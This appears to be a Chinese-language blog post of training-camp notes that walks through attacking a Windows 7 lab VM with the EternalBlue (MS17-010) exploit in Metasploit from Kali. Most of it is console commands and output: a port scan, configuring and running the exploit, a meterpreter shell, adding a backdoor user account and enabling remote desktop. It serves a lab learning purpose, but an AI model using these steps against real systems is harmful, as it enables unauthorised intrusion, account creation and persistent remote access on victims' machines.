2023.5.15老男孩网络安全集训营第一节_老男孩网络安全2023百度网-CSDN博客

本文链接：https://blog.csdn.net/m0_73293867/article/details/130761238

老男孩网路网络安全集训营

一、预备知识
二、kali虚拟机的配置
三、搭建Windows 7 旗舰版虚拟机
四、攻击靶机
五、遇到的问题

请正确使用本文内容，不得做违法的操作，如有违反概不负责。

一、预备知识

网络安全定位、现状
网关：是网络中实现不同网络之间连接和数据传输的关键节点。起到路由、转发和连接的不同网络的作用。

二、kali虚拟机的配置

下载kali虚拟机（直接用的压缩包）
配置网络连接方式
1. 桥接：测试连接网络成功
2. NAT：测试不成功
进入kali虚拟机：用户名密码都是kali
打开终端查看IP
登录到root环境：sudo su -
开启远程服务：/etc/init.d/ssh start
让SSH远程服务开机自启动：update-rc.d ssh enable
使用xshell远程连接kali

三、搭建Windows 7 旗舰版虚拟机

典型创立虚拟机，不用自己配置
直接用安装光盘文件，不要稍后安装，稍后安装会更新Windows7使目标漏洞修复。
搭建完成Windows7之后关闭防火墙。
查看IP地址

四、攻击靶机

攻击原理：利用kali中的已经写好的程序攻击已知的漏洞。
漏洞名称：Windows7永恒之蓝

具体操作步骤

将kali切换到root账户下sudo su -

┌──(kali?kali)-[~]
└─$ sudo su -
[sudo] password for kali: 
┏━(Message from Kali developers)
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ? https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
┌──(root??kali)-[~]
└─#

检查是否能ping通靶机

扫描135,445端口（samba端口）nmap -p 139,445 -Pn 靶机IP

┌──(root💀kali)-[~]
└─# nmap -p 139,445 -Pn 172.20.10.8
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds（主要看这两个是否为打开的状态）

进入到kali进攻环境msfconsole

┌──(root💀kali)-[~]
└─# msfconsole

搜索永恒之蓝漏洞攻击程序search ms17-010

msf6 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

查看攻击程序可使用范围建议用序号（这个用的是2号）info 2

msf6 > info 2

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  Equation Group
  Shadow Brokers
  thelightcosine

Available targets:
  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT          445              yes       The target port (TCP)
  SMBDomain      .                no        (Optional) The Windows domain to use for authentication
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, 
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
  where a DWORD is subtracted into a WORD. The kernel pool is groomed 
  so that overflow is well laid-out to overwrite an SMBv1 buffer. 
  Actual RIP hijack is later completed in 
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
  not trigger 100% of the time, and should be run continuously until 
  triggered. It seems like the pool will get hot streaks and need a 
  cool down period before the shells rain in again. The module will 
  attempt to use Anonymous login, by default, to authenticate to 
  perform the exploit. If the user supplies credentials in the 
  SMBUser, SMBPass, and SMBDomain options it will use those instead. 
  On some systems, this module may cause system instability and 
  crashes, such as a BSOD or a reboot. This may be more likely with 
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://cvedetails.com/cve/CVE-2017-0143/
  https://cvedetails.com/cve/CVE-2017-0144/
  https://cvedetails.com/cve/CVE-2017-0145/
  https://cvedetails.com/cve/CVE-2017-0146/
  https://cvedetails.com/cve/CVE-2017-0147/
  https://cvedetails.com/cve/CVE-2017-0148/
  https://github.com/RiskSense-Ops/MS17-010

Also known as:
  ETERNALBLUE

使用漏洞攻击程序use 2

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

设置攻击靶机的IPset rhosts 靶机IP

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.20.10.8
rhosts => 172.20.10.8

执行攻击程序run（WIN就可以）

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.20.10.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

进入靶机的docs环境shell

meterpreter > shell
Process 2104 created.
Channel 1 created.
Microsoft Windows [°汾 6.1.7600]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

C:\Windows\system32>

创建用户

C:\Windows\system32>net user oldgirl 123 /add
net user oldgirl 123 /add
ļ®³ɹ¦Ϊ³ɡ£

添加为管理员

C:\Windows\system32>nat localgroup administrators oldgirl /add
nat localgroup administrators oldgirl /add
'nat' ²»ˇŚ²¿»󎢲¿ļ®£¬Ҳ²»ˇ¿ʔ̐еĳ͐ 
»󆺴¦mτ¼þ¡£

退出靶机

C:\Windows\system32>exit
exit
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230519030303_default_172.20.10.8_host.windows.cle_231609.txt
meterpreter >

远程激活靶机桌面

meterpreter > run post/windows/manage/enable_rdp

在这之后就可以使用远程桌面连接连接到靶机了。

五、遇到的问题

在NAT模式下连接不到网络
- 第一次实验
  - 改动：更改虚拟机的虚拟网络编辑器，把网关从10.0.0.254改为10.0.0.1和主机终端显示的网关保持一致。
  - 实验结果：失败
- 第二次实验
  - 改动：允许防火墙接收来自虚拟机的ICMP请求
  - 实验结果：失败
- 第三次实验
  - 改动：删除虚拟机重新听课安装，并且不用NAT模式用桥接模式
  - 实验结构：成功
  - 原因：重新听一遍视频之后，发现没有在kali虚拟机启动远程连接服务。但是还是没有发现NAT模式下为什么不能用
连接不到网络的几个原因
- 桥接状态下
  - 主机的防火墙把虚拟机的请求阻挡在外边
  - IP和网关没有和主机的匹配
  - VMware虚拟网关有问题
  - 在虚拟机端没有启动远程连接服务